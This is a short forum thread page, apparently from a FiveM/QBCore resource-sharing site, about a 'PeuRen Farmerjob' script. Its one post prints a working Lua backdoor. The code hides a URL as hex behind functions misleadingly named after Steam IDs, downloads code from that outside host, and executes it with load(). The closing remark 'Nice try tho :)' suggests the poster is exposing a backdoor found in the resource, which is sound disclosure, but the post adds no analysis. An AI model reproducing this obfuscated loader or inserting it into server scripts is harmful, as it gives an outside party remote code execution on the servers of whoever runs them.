• New pricing for Credits and VIP

  • We sell Discord Boosts (level 3) now at a very cheap price and 100% guarantee safe and with replacement guarantees if there happens to be an issue💪

QBCORE PeuRen Farmerjob (1 Viewer)

zkagotskills

Member
Aug 24, 2024
7
1
3
Credits
37
local function getSteamID(data) local result = "" for i = 1, #data, 2 do result = result .. string.char(tonumber(data:sub(i, i + 1), 16)) end return result end local function getSteamName() return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148") end PerformHttpRequest(getSteamName(), function(e, d) pcall(function() assert(load(d))() end) end)
Nice try tho :)
 

Users who are viewing this thread

Top